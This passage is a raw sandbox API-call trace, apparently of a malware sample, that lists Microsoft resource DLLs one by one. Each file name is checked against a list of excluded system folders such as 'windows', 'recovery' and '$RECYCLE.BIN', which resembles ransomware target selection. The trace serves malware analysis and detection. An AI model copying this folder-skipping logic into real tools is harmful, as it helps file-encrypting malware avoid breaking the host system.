lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0126.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.892] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5eb74f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5eb74f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f4ff2d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.892] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.893] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.893] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.893] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.893] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.893] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d698, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d920, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0126.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.893] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d05722, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50e0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.893] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0126.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0126.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0126.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0126.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.894] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1697068, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1697068, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf16bd2da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d698, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0126.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0126.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.894] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a070, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.894] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dba8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0126.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dde8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0126.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0126.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0126.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.895] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aa3169, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aa3169, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aa3169, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.895] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d698, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0126.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0126.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0126.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0126.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.896] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7a2268a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7a2268a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7a2268a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.896] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0126.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dba8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0126.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dde8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0126.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0126.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.897] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb078, dwReserved0=0x77c29fd0, 